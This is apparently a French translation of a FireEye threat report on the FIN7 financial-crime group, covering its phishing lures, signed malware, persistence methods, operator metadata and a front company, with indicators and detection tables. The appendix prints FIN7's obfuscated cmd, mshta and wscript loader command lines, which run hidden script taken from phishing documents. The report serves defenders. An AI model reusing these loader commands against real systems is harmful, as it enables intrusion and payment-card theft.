L’innovation, clé de la réussite de FIN7
Pendant son long travail d'observation des activités de FIN7, FireEye avaient pu constater sa capacité à rester maître du jeu et à échapper à toute détection. Pour nous, il ne faisait aucun doute que leurs tactiques innovantes étaient le signe d'une structure dotée de gros moyens humains et financiers. En avril 2017, par exemple, FireEye a publié un billet dans lequel nous expliquions comment les e-mails de spear-phishing attribués à FIN7 exploitaient des fichiers de liens masqués (extensions LNK) pour exécuter des fonctions VBScript par mshta.exe et contaminer la machine des victimes. Cette méthode tranchait avec les méthodes habituelles de FIN7, à savoir les macros Office piégées, tout en soulignant la capacité du groupe à échapper à la détection.
FireEye avait également signalé la présence de la backdoor CARBANAK comme outil post-intrusion destiné à s'établir durablement sur le réseau compromis et maintenir l’accès à l’environnement des entreprises victimes. Utilisée dans des attaques extrêmement fructueuses et sophistiquées dès 2013, CARBANAK est une vulnérabilité aujourd'hui bien connue. On estime que FIN7 a commencé à l’utiliser fin 2015, même si l’interconnexion des campagnes recourant à ce malware n’est pas clairement établie sur ces cinq dernières années. FIN7 se démarquait par la créativité des mécanismes de persistance utilisés pour lancer CARBANAK. Concrètement, le groupe employait une base de données de shims applicatifs, qui injectait un correctif malveillant en mémoire dans le processus du Gestionnaire de contrôle des services ("services.exe"), puis activait un processus CARBANAK. FIN7 recourait également à cette tactique pour installer un utilitaire de collecte d’informations de carte de paiement.
Autre signe particulier de FIN7 : l’usage intensif de certificats numériques. Naturellement, les instigateurs de ces attaques ont cherché à profiter de la légitimité que leur conféraient ces certificats. Grâce aux signatures numériques de leurs documents de phishing, backdoors et outils post-intrusion, FIN7 a pu contourner de nombreux contrôles de sécurité limitant l’exécution des macros dans les documents Office et les fichiers binaires non signés sur les systèmes approuvés.
Organisation |
Pays |
Numéro de série |
|
Korsar Travel TOV |
UA |
88:21:ac:7e:6c:da:11:00:1d:b3:d3:1a:16:c1:5c:26 |
korsartravel@bk.ru |
Kaitschuck James |
GB |
30:2e:7f:14:3a:f3:f3:98:20:70:42:4e:ea:52:5d:d2 |
oliversoftware@hotmail.com |
Park Travel |
RU |
4d:e2:87:56:98:bf:c7:74:a3:f3:47:d6:70:7c:9b:f0 |
inga@parktravel-mx.ru |
Tableau 1 : Exemples de certificats de signature de code utilisés par FIN7
FIN7 a mis au point des techniques de furtivité à un rythme soutenu. Tout au long de l'année 2017, FIN7 a créé de nouvelles méthodes de dissimulation, allant même jusqu'à les modifier à une cadence journalière pour lancer des attaques visant une multitude de victimes. L’organisation criminelle testait régulièrement des documents de phishing aux formats DOC, DOCX et RTF sur des référentiels publics pour jauger les capacités de blocage des moteurs de détection statique. Elle a également développé un style inédit de dissimulation de payload, à savoir la substitution de chaînes natives de l’interpréteur 'de commandes de Windows (cmd.exe). La méthode était si novatrice que FireEye lui a même donné un nom" : « FINcoding »." Ces méthodes ont inspiré une analyse de la technique de dissimulation profonde par ligne de commande et la publication de l’outil 'Invoke-DOSfuscation par Daniel Bohannon. Les tableaux 2 et 3 recensent quelques échantillons et leurs techniques de dissimulation par ligne de commande.
FIN7 et ses techniques agressives d'ingénierie sociale
Au cours de ces trois années passées à répondre à une multitude de compromissions et à préparer des clients face à FIN7, FireEye a pu observer ses talents incontestables en ingénierie sociale. Utilisation de formulaires web pour le premier contact, ciblage et communication directe avec le gérant d'un magasin… les pirates ont fait preuve d’une imagination débordante. De fait, les capacités d’action de FIN7 s’étendent bien au-delà des systèmes informatiques de leurs cibles. FireEye est intervenu sur des incidents où FIN7 avait appelé les victimes avant de formuler une réclamation par Internet contenant des fichiers malveillants, mais aussi après l’envoi de ces documents de phishing pour s’assurer de leur bonne réception. Une méthode rudimentaire, mais audacieuse et redoutablement efficace.
L’expérience aidant, FIN7 a affiné ses subterfuges et modèles de phishing, le plus souvent envoyés à partir d’adresses de personnes et d’entreprises imaginaires mais très bien incarnées, voire parfois à partir d’adresses en apparence légitimes d'organismes publics. Ses opérations de phishing s'emparaient souvent de sujets urgents et de grande importance aux yeux des entreprises ciblées. Dans les points de vente, les gérants étaient contactés à propos d’articles perdus ou d’un « trop payé », ticket de caisse à l'appui. D’autres e-mails de phishing de FIN7 imitaient des commandes détaillées de repas ou des demandes de menus spéciaux pour les personnes soumises à des régimes particuliers.
Début 2017, une nouvelle tactique est apparue et a perduré pendant plus d’un an : FIN7 contactait des magasins et des sièges sociaux pour se plaindre d’intoxications alimentaires par le biais d’e-mails contenant des pièces jointes malveillantes. Surnommée « FINdigestion » par FireEye en interne, cette série de réclamations a progressivement dépassé le cadre de plaintes individuelles pour prendre la forme de soi-disant poursuites engagées par des organismes sanitaires publics, comme illustré à la Figure 1.
Figure 1 : E-mail de spear-phishing estampillé FDA
Il est intéressant de noter que l’activité de la backdoor BATELEUR, identifiée pour la première fois par Proofpoint en juillet 2017, utilise des images très bien travaillées, souvent créées dans Adobe Photoshop. FireEye soupçonne que cette activité provient d’un sous-groupe de FIN7. Dans cette même campagne de phishing, la pièce jointe malveillante de FIN7 présentait de fortes correspondances graphiques, comme illustré à la Figure 2.
Figure 2 : Pièce jointe de spear-phishing estampillée FDA
Pendant toute la durée des opérations, la conception des documents est restée très professionnelle, et le développement de fichiers de phishing s’est poursuivi en parallèle d'autres outils post-intrusion. Tout porte donc à croire que FIN7 s’appuyait sur une organisation criminelle dotée d'importantes ressources.
Traque des métadonnées
FireEye a suivi plusieurs des acteurs de FIN7 en analysant les métadonnées de types de fichiers d’intérêt forensique. Dans un précédent billet, nous expliquions que les fichiers LNK créés par FIN7 révélaient involontairement des informations précieuses sur leur environnement de développement.
Les fichiers LNK peuvent en effet contenir des métadonnées dévoilant les caractéristiques des systèmes sur lesquels ils ont été créés : chemins d’accès aux fichiers d’origine, numéros de série des volumes, adresses MAC et noms d’hôte. En examinant les valeurs des métadonnées LNK, nous pouvons souvent identifier des "« marques »", à savoir des valeurs uniques associées à certains développeurs et opérateurs de malwares.
Les métadonnées LNK de FIN7 montrent que les pirates utilisaient des machines virtuelles avec des noms d’hôte génériques tels que ANDY-PC ou USER-PC, ainsi que des noms d’hôte par défaut comportant la structure WIN-[A-Z0-9]{11} (p. ex. WIN-ABCDEFGH1JK).
FireEye a suivi plusieurs marques et indices de noms d’hôte et de chemins d’accès associés aux opérations de FIN7 pour établir des liens entre les foyers d’activité malveillante. Ces marques pouvaient être liées aux membres de FIN7 impliqués tant dans le développement que dans les aspects opérationnels de l’organisation. D’après les données techniques détaillées dans la partie Annexe technique, plusieurs personnages se distinguent :
- "andy" / "andy-pc"
- "Hass"
- "jimbo"
- "Константин" (Konstantin)
- "oleg"
Cette analyse nous a permis de mieux comprendre les systèmes de FIN7 et de corréler l’activité des futures attaques aux différents personnages identifiés. De plus, l’analyse des métadonnées a facilité le traçage des fichiers générés par le groupe et l’exploitation des marques connues pour détecter d’autres méthodes d’attaque (connexions RDP directes ou accès par SMB) si le groupe changeait de tactiques, techniques et procédures (TTP).
Lecture vidéo des opérations de FIN7
Pendant l'intervention de nos spécialistes sur plusieurs intrusions de FIN7, FireEye a récupéré un programme d’enregistrement vidéo qu’utilisait FIN7 pour ses opérations. Après avoir recréé le protocole vidéo par rétroingénierie, l’équipe FLARE de FireEye en a conclu qu'il avait été créé spécialement par FIN7 : aucune dépendance à des bibliothèques externes, commentaires en cyrillique dans le code et lecteur vidéo spécial que seul FIN7 utilise. Très vraisemblablement, les pirates utilisaient cette fonction d’enregistrement vidéo pour surveiller les environnements infiltrés et renseigner les étapes suivantes de leurs attaques.
FireEye a obtenu de sources sûres une version du lecteur vidéo des développeurs criminels. Connaissant le protocole par rétroingénierie, l’équipe FLARE a modifié le code source pour qu’il prenne en charge plusieurs versions de l'encodage personnalisé de FIN7. Dès lors que les victimes concernées sont en possession de ces fichiers, FireEye peut ainsi décoder et lire la surveillance vidéo de FIN7.
Récentes évolutions dans le mode opératoire de FIN7
Tout au long de l’année 2018, FireEye a continué d’identifier de nombreux domaines enregistrés selon un mode opératoire rappelant les activités passées de FIN7, mais aussi des campagnes dont les diverses techniques, tactiques et procédures (TTP) ont été attribuées à FIN7 avec plus ou moins de certitude. Des archives ZIP contenant la backdoor BIRDDOG étaient hébergées sur une partie des domaines FIN7 présumés, enregistrés en 2018. Certains indices caractérisant plus précisément la nature de cette campagne laissent à penser que ces documents malveillants étaient envoyés aux clients d’établissements financiers en Europe de l’Est et en Asie centrale dès septembre 2017. Le ciblage d’individus, au lieu d’entreprises, marquerait un tournant radical de leur stratégie, bien que les banques usurpées dans ces campagnes aient en fait pu constituer les cibles finales de 'FIN7.
Par ailleurs, nous avons identifié des similitudes entre l’activité de FIN7 et les campagnes BATELEUR, des attaques ciblant principalement des chaînes de restauration américaines dès la mi-2017. Ces campagnes s'appuyaient sur des documents Word contenant des macros jointes directement aux e-mails ou hébergés sur Google Drive. Élaborés avec le plus grand soin, ces documents ressemblaient à s'y méprendre à des documents officiels d'organisations diverses (associations d’entreprises de la restauration, revendeurs d’équipements pour points de vente, etc.). Cette activité présumée de FIN7 s’est poursuivie après les récentes arrestations annoncées par les autorités américaines, même si les attaquants utilisent désormais une nouvelle backdoor JavaScript baptisée GRIFFON.
Ces récentes campagnes pourraient traduire un effort de diversification des TTP pour échapper à la détection, voire signaler la formation de groupes satellites de FIN7 menant séparément leurs propres campagnes. Dans tous les cas, les entreprises doivent rester extrêmement vigilantes et attentives aux changements dans les méthodes employées par les acteurs de FIN7.
Découverte de la société-écran et des domaines d’activité de FIN7
Figure 3 : Logo de Combi Security, tel que récupéré dans le cache du site combisecurity.com en 2016.
D’après les autorités judiciaires américaines, une partie de l’activité de FIN7 se serait déroulée depuis une société-écran dénommée Combi Security. Un cache de son site web révèle que l’entreprise prétendait être « le leader mondial de la protection des grands systèmes d'information face aux cybermenaces modernes », avec des bureau à Moscou, Haïfa et Odessa. Nous avons retrouvé des offres d’emploi de Combi Security sur des sites d’annonces russes, ukrainiens et ouzbèks bien connus, ainsi que de nombreux individus qui, selon toute vraisemblance, travaillaient pour l’entreprise. Étant donné l’authenticité apparente de ces offres d’emploi, il est probable que certains salariés n’avaient pas saisi le caractère illégal de leurs missions. Certes, le recrutement de personnes peu méfiantes comme marionnettes est une méthode courante pour certaines organisations criminelles pratiquant le « reshipping scam » : les « mules » de réacheminement sont recrutées au travers d’offres attrayantes de travail à domicile publiées sur des sites d’annonces. Mais la conduite d’escroqueries financières à grande échelle sous couvert de missions de cybersécurité sort vraiment de l'ordinaire. Le succès apparent de Combi Security pour recruter des individus peu soupçonneux pourrait faire des émules dans le milieu de la cybercriminalité.
Éclatement en sous-groupes ?
Outre les individus récemment appréhendés, l’organisation criminelle qui se cache derrière FIN7 compte presque certainement de nombreux autres cadres. FireEye iSIGHT Intelligence s'attend à ce qu’au moins une partie d'entre eux poursuivent leurs activités criminelles d’une manière ou d’une autre. Malgré cela, il y a fort à parier qu’ils changent leurs TTP ou cessent provisoirement leur activité, comme c'est souvent le cas après des événements d’importance comme l’arrestation de chefs de l’organisation et/ou la divulgation publique des TTP utilisées.
En fonction de la structure et des modes de communication du groupe, il est également probable que plusieurs sous-groupes se forment pour mener des opérations chacun de leur côté. Les campagnes récentes, y compris celles dont les tactiques contrastent avec les méthodes historiques de FIN7 (campagnes SEC à grande diffusion, etc.), pourraient être le signe d'une organisation en groupes semi-autonomes préexistants au sein de FIN7. Comme nous l'évoquions dans notre présentation de CARBANAK, certaines familles et techniques de malwares ne sont pas strictement représentatives d’un groupe criminel particulier. Elles peuvent en effet être recyclées par les développeurs et les opérateurs au gré de leurs changements de groupe ou de campagne.
Conclusion
Les récentes arrestations annoncées par les autorités judiciaires américaines soulignent les synergies d'une action commune des acteurs privés et publics pour faire échec aux organisations cybercriminelles. Comme le démontre le groupe FIN7, les protagonistes du cybercrime financier sont aujourd'hui en capacité d’infliger des dégâts considérables au travers de vastes campagnes soigneusement orchestrées. Alors que des groupes de très haut niveau continuent de voir le jour, les partenariats public-privé sont appelés à jouer un rôle majeur dans la lutte contre ces menaces.
Remerciements
Jordan Nuce, Tom Bennett, Michael Bailey et Daniel Bohannon
Annexe technique
FireEye est intervenu sur de nombreux incidents imputés à FIN7, ce qui nous a permis de tirer de riches enseignements sur les opérations du groupe. Dans ce billet, nous recensons également les nombreux indicateurs que nous attribuons à FIN7, assortis d’une présentation des techniques utilisées. Nous comptons ainsi aider les entreprises à identifier plus facilement toute activité malveillante sur leur réseau.
Détails techniques des documents de phishing
Outre les métadonnées des fichiers LNK, les documents de phishing de FIN7 contenaient souvent des éléments détaillant les chemins d’accès locaux de fichiers servant à leur création. Dans les tableaux suivants, nous avons également inclus des exemples de la multitude de techniques de dissimulation par ligne de commande employées par FIN7. Il est intéressant de noter la proximité chronologique entre des documents employant des techniques différentes.
Date de création EXIF |
Auteur |
Malware |
MD5 |
Nom de fichier |
||
2018:05:21 17:32:00 |
FIN7 présumé |
GRIFFON |
7e703dddcfc83cd352a910b48eaca95e |
|
||
C:\Users\jimbo\Desktop\Files\Картинки\outlook2.png |
||||||
cmd.exe /k "SET a01=wscr& SET a02=ipt&&call %a01%%a02% /e:jscript //b %TEMP%\errors.txt |
||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
||
2018:01:26 15:59:00 |
FIN7 présumé |
BATELEUR |
bb1a76702e2e7d0aa23385f24683d214 |
Doc1.doc |
||
C:\Users\Hass\Desktop\Картинки\New\outlook3.png |
||||||
cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini |
||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
||
2018:01:11 13:16:00 |
FIN7 présumé |
BATELEUR |
5972597b729a7d2853a3b37444e58e01 |
check.doc |
||
C:\Users\Hass\Desktop\Картинки\New\outlook2.png |
||||||
cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini |
||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
||
2017:10:25 07:43:00 |
FIN7 présumé |
BATELEUR |
c4aabdcf19898d9c30c4c2edea0147f0 |
document1.doc |
||
C:\Users\oleg\Desktop\Файлы\Картинки\New\defender.jpg |
||||||
cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini |
||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
||
2017:06:23 15:18:00 |
FIN7 présumé |
BATELEUR |
467062d2a5a341716c42c6d7f36ba0ed |
check.doc |
||
C:\Users\Work\Desktop\IMAGES\outlook2.png |
||||||
wscript.exe //b /e:jscript %TEMP%\debug.txt |
||||||
Tableau 2 : Paramètres de lancement d'une campagne de spear-phishing, vraisemblablement d’origine FIN7, et traces du système local des attaquants
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:10:06 11:21:00 |
FIN7 |
HALFBAKED |
29a3666cee0762fcd731fa663ebc0011 |
Doc0610.docx |
|||
C:\Users\andy\Desktop\unlock.cmd |
|||||||
cmd /c ""%TMP%\unlock.cmd" " |
|||||||
@set w=wsc@ript /b /e:js@cript %HOMEPATH%\tt.txt |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:09:27 11:56:00 |
FIN7 |
HALFBAKED |
6146a18570e134c6c32633aca14375fb |
Doc2709.docx |
|||
C:\Users\usr\Documents\send\270917\unlock.doc.lnk |
|||||||
wmic.exe process call create "cmd start /min cmd /c for /f \"usebackq delims=\" %x in (`FindStr /R /C:\"@#[0-9]#@\" \"%TEMP%\unlock.doc.lnk\"`) do %x|cmd >nul 2>&1 &" |
|||||||
cmd.exe /S /D /c" echo /*@#8#@*/try{sh=new ActiveXObject("Wscript.Shell");fs=new ActiveXObject("Scripting.FileSystemObject");p=sh.ExpandEnvironmentStrings("%TM"+"P%");f=fs.GetFile(p+"//unlock.doc.lnk");s=f.OpenAsTextStream(1,0);c=s.Read(2403);c=s.ReadAll();s.Close();this[String.fromCharCode(101)+'va'+'l'](c);}catch(e){} >%HOMEPATH%\t.txt & wscript //b /e:jscript %HOMEPATH%\t.txt >nul 2>&1 &" |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:08:08 17:38:00 |
FIN7 |
HALFBAKED |
03e85ad4217775906e6b5ceae8dc27af |
Doc_n0908.rtf |
|||
C:\Users\andy\Desktop\unlock.doc.lnk |
|||||||
wmic.exe process call create "mshta javascript:eval(\"try{eval('wall=GetObject(\\'\\''+String.fromCharCode(44)+'\\'Word.Application\\')');eval(wall.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){};close();\")" |
|||||||
mshta.exe "try{jelo = 'try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+\\'va\\'+\\'l\\'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){};';var fso = new ActiveXObject("Scripting.FileSystemObject");var sh = new ActiveXObject("Wscript.Shell");var p = sh.ExpandEnvironmentStrings("%HOMEPATH%") + "\\\\jelo.txt"" |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:07:27 15:51:00 |
FIN7 |
HALFBAKED |
63e2eb258a85ed4e72f951cdbff2a58e |
Dooq.docx |
|||
C:\Users\jinvr-3-1\Desktop\unlock.doc.lnk |
|||||||
cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\ttt.txt & echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%\ttt.txt & echo %x:@=%|cmd |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:06:28 16:21:00 |
FIN7 |
HALFBAKED |
22ad7c05128ca7b48b0a2a4507803b16 |
Doc0507.rtf |
|||
C:\Users\andy\Desktop\unprotect.rtf.lnk |
|||||||
cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\md5.txt & echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%\md5.txt & echo %x:@=%|cmd |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:05:11 12:59:00 |
FIN7 |
HALFBAKED |
99975b5ee2ddd31e89c9bdda7a3871d9 |
Doc1.docx |
|||
C:\Users\user\Documents\unprotect.lnk |
|||||||
C:\WINDOWS\system32\mshta.exe vbscript:Execute("On Error Resume Next:set yjdsqjtrn=GetObject(,""Word.Application""):execute yjdsqjtrn.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close") |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:04:20 16:27:00 |
FIN7 |
HALFBAKED |
42a2a2352f6b1f5818f3b695f240fc3a |
info.rtf |
|||
C:\Users\testadmin.TEST\Desktop\unprotect.lnk |
|||||||
C:\WINDOWS\system32\mshta.exe vbscript:Execute("On Error Resume Next:set wprotect=GetObject(,""Word.Application""):execute wprotect.ActiveDocument.Shapes(1).TextFrame.TextRange.Text:close") |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2017:01:12 18:00:00 |
FIN7 |
HALFBAKED |
cea2989309ccd5128f437335622978f1 |
order.rtf |
|||
C:\Users\testadmin.TEST\Desktop\unprotected.vbe |
|||||||
%WINDIR%\System32\Wscript.exe %TEMP%\WindowsUpdate_X24532\beginer.vbs |
|||||||
Date de création EXIF |
Auteur présumé |
Malware |
MD5 |
Nom de fichier |
|||
2016:08:12 11:26:00 |
FIN7 |
HALFBAKED |
fbf653b89a0814f515ddbdcf82cc3795 |
Reservation - Copy.docx |
|||
C:\Users\test\Documents\sploits\120816\order.vbe |
|||||||
%WINDIR%\System32\Wscript.exe %TEMP%\AdobeUpdateManagementTool.vbs |
|||||||
Tableau 3 : Paramètres de lancement d'une campagne de spear-phishing d’origine FIN7 et traces du système local des attaquants
Tactiques, techniques et & procédures (TTP) de FIN7
FireEye fournit ici des informations sur les méthodologies caractéristiques de FIN7 aux différentes étapes du cycle d’attaque, ainsi que des renseignements visant à faciliter l'identification de traces d'activités suspectes identiques ou comparables dans votre environnement.
Étape du cycle d’attaque |
Méthodologie d’attaque |
À examiner |
Compromission initiale |
E-mails de spear-phishing envoyés par PHP Mailer |
E-mails entrants contenant des métadonnées de type « X-Mailer: PHPMailer » |
Implantation |
Persistance à l’aide des clés de registre Run et Run Once |
Nouvelles entrées de registre Run et RunOnce référençant .VBS et .VBA |
Implantation |
Exécution ou persistance à l’aide de Tâches planifiées |
Nouvelle Tâche planifiée référençant .CMD, .LNK, .VBS, .VBA, .PS1 et d’autres extensions de langage de script |
Implantation |
Persistance à l’aide des services Windows et du répertoire de démarrage |
Nouveaux services Windows, nouveaux fichiers dans les répertoires de démarrage (Startup) |
Implantation |
Persistance à l’aide d’AppCompat Shim |
Nouveaux fichiers de base de données de shims (SDB) et modifications des clés de registre AppCompatFlags (voir le billet sur la persistance SDB selon FIN7) |
Maintien d'une présence |
C2 (commande et contrôle) avec ports C2 définis |
Connexions sortantes avec différences port-protocole sur des ports courants comme 53, 80, 443, 8080 |
Maintien d'une présence |
C2 (commande et contrôle) avec des domaines de 3e niveau génériques |
Connexions sortantes ou résolutions DNS vers des domaines de 2"e" niveau rudimentaires avec des domaines de 3e niveau génériques tels que mail, www1, www2, dns, ftp (ex. : « mail[.]qefg[.]info ») |
Maintien d'une présence |
C2 à l’aide d’une infrastructure VPS de faible réputation |
Connexions entrantes et sortantes depuis/vers des plages d’adresses IP non standard, en particulier depuis les fournisseurs internationaux de VPS (Virtual Private Server) |
Maintien d'une présence |
C2 en utilisant des services légitimes, dont Google Docs, Google Scripts et Pastebin |
|
Maintien d'une présence |
C2 en utilisant DNS via des enregistrements A, OPT, TXT |
Requêtes d’enregistrements DNS A, TXT et OPT anormalement longues ou nombreuses |
Maintien d'une présence |
Domaines de C2 enregistrés auprès de REG.RU |
Nouveaux domaines enregistrés via REG.RU |
Maintien d'une présence |
Domaines de C2 enregistrés auprès de NameCheap |
Nouveaux domaines enregistrés via NameCheap |
Maintien d'une présence |
Domaines de C2 enregistrés sous forme inhabituelle et avec des domaines de premier niveau |
Requêtes DNS exceptionnellement longues ou nombreuses, selon la structure [a-zA-Z]{4,5}\.[pw|us|club|info|site|top] (ex. : « pvze[.]club ») |
Maintien d'une présence |
Domaines de C2 enregistrés avec un tiret |
Connexions sortantes vers des domaines récemment enregistrés et portant un tiret |
Tableau 4 : FIN7 TTPs
Indicateurs de FIN7
FireEye publie ces indicateurs techniques détaillés pour aider toutes les personnes intéressées à mieux cerner les auteurs de la menace et à rechercher l’historique de leurs activités sur les réseaux d’entreprise.
Droppers dans les documents de phishing
Nom de fichier |
MD5 |
Auteur présumé |
Malware |
menu.rtf |
c14eb54769ff208a2562e4ef47958d9e |
FIN7 |
|
|
76eb6f124fba6599a54e92b829c55b63 |
FIN7 |
BEACON |
3-ThompsonDan.rtf |
4b783bd0bd7fcf880ca75359d9fc4da6 |
FIN7 |
BEACON |
claim.rtf |
af53db730732aa7db5fdd45ebba34b94 |
FIN7 |
BEACON |
order.rtf |
cea2989309ccd5128f437335622978f1 |
FIN7 |
BEACON |
order.rtf |
cf4ccb3707e5597969738b4754782e4d |
FIN7 |
BEACON |
Doc2_rtf.rtf |
2dc0f4bece10759307026d90f585e006 |
FIN7 |
BEACON |
doc1.doc |
37759603c6cd91ebc8a1ea9ac0f2d580 |
FIN7 |
BEACON |
quote.rtf |
3c0bd71e91e0f18621ba43de4419f901 |
FIN7 |
BEACON |
Doc2_rtf.rtf |
562a64f1c09306d385962cf8084b6827 |
FIN7 |
BEACON |
information.doc |
5dace5ac5ba89c9bba4479264f75b2b6 |
FIN7 |
BEACON |
Doc_rest_rtf.rtf |
619aa4e6c9db275381ab0e7fc7078f5f |
FIN7 |
BEACON |
doc1.docx |
67c9bfd4d6ac397fb0cd7da2441a6fe2 |
FIN7 |
BEACON |
Doc33.docx |
6a5a42ed234910121dbb7d1994ab5a5e |
FIN7 |
BEACON |
info_.rtf |
6ac5ae6546746e3a9502cc489b71146e |
FIN7 |
BEACON |
bmg.docx |
754fc509328af413d93131e65fc46d31 |
FIN7 |
BEACON |
Doc_0405_1.rtf |
7b2315ff1f2d763857aa70ad34b75449 |
FIN7 |
BEACON |
doc1.docx |
99975b5ee2ddd31e89c9bdda7a3871d9 |
FIN7 |
BEACON |
doc0505_1.rtf |
9eb71edd5ec99294a1c341efa780b1b1 |
FIN7 |
BEACON |
DonovanR.docx |
b5829caad7c448c558cb1dab2d9f4320 |
FIN7 |
BEACON |
rising star.rtf |
c8b8420d1503ae48ff35362f5d29eeb3 |
FIN7 |
BEACON |
inf6.docx |
e494356fc0db7ef6009d29e5ae869717 |
FIN7 |
BEACON |
Claim.docx |
06b9e2fdd2c0eeb78b851c93ca66f25f |
FIN7 |
BELLHOP |
order.rtf |
80eed9f87a18b0093eb3f16fa495b6f7 |
FIN7 |
BELLHOP |
Details Joseph.docx |
b4d48f3e1ae339f2fcb94b7abceecfff |
FIN7 |
BELLHOP |
order.doc |
e2a6b351c276d02d71e18cd0677e8236 |
FIN7 |
BELLHOP |
|
b14bc8cbc7f2d36179ebff96ade6d867 |
FIN7 |
CARBANAK |
features.doc |
bbd99ef280efebe9066c0aef91bf02cd |
FIN7 |
DRIFTPIN |
doc2709.rtf |
01d666fcbc4cdcedbfe7963f498e7858 |
FIN7 |
HALFBAKED |
doc_n0908.rtf |
03e85ad4217775906e6b5ceae8dc27af |
FIN7 |
HALFBAKED |
doc1.docx |
0d6619481cfd29791a51ebb42ace5c03 |
FIN7 |
HALFBAKED |
doc1.rtf |
0e0a51489054529a9dcb177d39f08b81 |
FIN7 |
HALFBAKED |
doc0719.docx |
101bdbbd99cfd74aa5724842404642f2 |
FIN7 |
HALFBAKED |
doc0507.docx |
17fabe288d640476a70154c59d5a1ba1 |
FIN7 |
HALFBAKED |
info_1.rtf |
189c5a090d2b3b87ab65a8b156cd971e |
FIN7 |
HALFBAKED |
doc.docx |
1a6c18967f4ce1c91c77098af4957e6e |
FIN7 |
HALFBAKED |
Mail.rtf |
1a9e113b2f3caa7a141a94c8bc187ea7 |
FIN7 |
HALFBAKED |
Doc_rest_n_rtf.rtf |
1f5022a02c82fbe414dc91bf3f1b5180 |
FIN7 |
HALFBAKED |
doc.docx |
1f98c4ff12fc2c6fbf8247a5b2e4e7f4 |
FIN7 |
HALFBAKED |
doc1909.docx |
1fbe77a3b5771ce4f95e02a49c5b7f30 |
FIN7 |
HALFBAKED |
doc_n0808.rtf |
21926646a658bdf39cf28cdfbb1aced7 |
FIN7 |
HALFBAKED |
doc0507.rtf |
22ad7c05128ca7b48b0a2a4507803b16 |
FIN7 |
HALFBAKED |
Doc2.docx |
22e7d4f7401ef34b3b6d17c15291c497 |
FIN7 |
HALFBAKED |
menu.rtf |
24fab1e9831e57307d17981abaabf960 |
FIN7 |
HALFBAKED |
2-order.docx |
28ad8e3a225400a1d00f6023f8e6c9c8 |
FIN7 |
HALFBAKED |
doc0610.docx |
29a3666cee0762fcd731fa663ebc0011 |
FIN7 |
HALFBAKED |
doc2209_1.rtf |
2d36634974c85eff393698b39edc561c |
FIN7 |
HALFBAKED |
Doc1.rtf |
307a9ce257e97189e046fa91d3c27dab |
FIN7 |
HALFBAKED |
doc1.rtf |
325844f1b956c52fc220932bc717f224 |
FIN7 |
HALFBAKED |
doc0910.rtf |
3917028799d2aa3a43ec5bad067e99a5 |
FIN7 |
HALFBAKED |
doc1.docx |
397d45b6001919b04739e26379c84dd9 |
FIN7 |
HALFBAKED |
docr.rtf |
3a303f02e16d7d27fa78c3f48a55d992 |
FIN7 |
HALFBAKED |
oliver_davis.docx |
3b12f36a01326ec649e4def08b860339 |
FIN7 |
HALFBAKED |
doc2209.docx.docx |
402c34d7d6ce92bf5a048023bd2fde4a |
FIN7 |
HALFBAKED |
Dooq.docx |
41c6861313e731bd3f84dd70360573ce |
FIN7 |
HALFBAKED |
info.rtf |
42a2a2352f6b1f5818f3b695f240fc3a |
FIN7 |
HALFBAKED |
james.docx |
499ebef3ab31a2f98fc8a358bd085b0f |
FIN7 |
HALFBAKED |
doc1007.rtf |
4b7a742d5c98fc62f0f67445032e7bc6 |
FIN7 |
HALFBAKED |
tem6.doc |
4bf691809224d17e49cebb071d22a867 |
FIN7 |
HALFBAKED |
doc1.rtf |
511af2b4c62fa4c2bb91f3be1ca96094 |
FIN7 |
HALFBAKED |
doc1.docx |
52cf6a63da29331d805a5a9b5015580f |
FIN7 |
HALFBAKED |
doc2209.rtf |
560e72858ee413d7a6f72fff5ab7577b |
FIN7 |
HALFBAKED |
doc1.docx |
5a0b796c7a6040e02c822cac4475f11a |
FIN7 |
HALFBAKED |
doc0717.rtf |
5d49b444734b003b6917b81f0a779b3e |
FIN7 |
HALFBAKED |
|
5d9525b48870dc438130bd96fb8c5b66 |
FIN7 |
HALFBAKED |
doc2.doc |
5dd2e677fd1d65f051b7f54e7402721f |
FIN7 |
HALFBAKED |
Dooq.docx |
63e2eb258a85ed4e72f951cdbff2a58e |
FIN7 |
HALFBAKED |
doc0720.rtf |
6a860285a6f7521995151a2a0cb6e316 |
FIN7 |
HALFBAKED |
doc0719.rtf |
6adec78e874232722c3758bbbcb95829 |
FIN7 |
HALFBAKED |
virus.docx |
70f0f8db551dd6b084682188c3923e26 |
FIN7 |
HALFBAKED |
check.rtf |
72d973ebfbc00d26170bfafdfbbd0179 |
FIN7 |
HALFBAKED |
Doc_0405.rtf |
74165408ff12d195fb9d68afe0a6011e |
FIN7 |
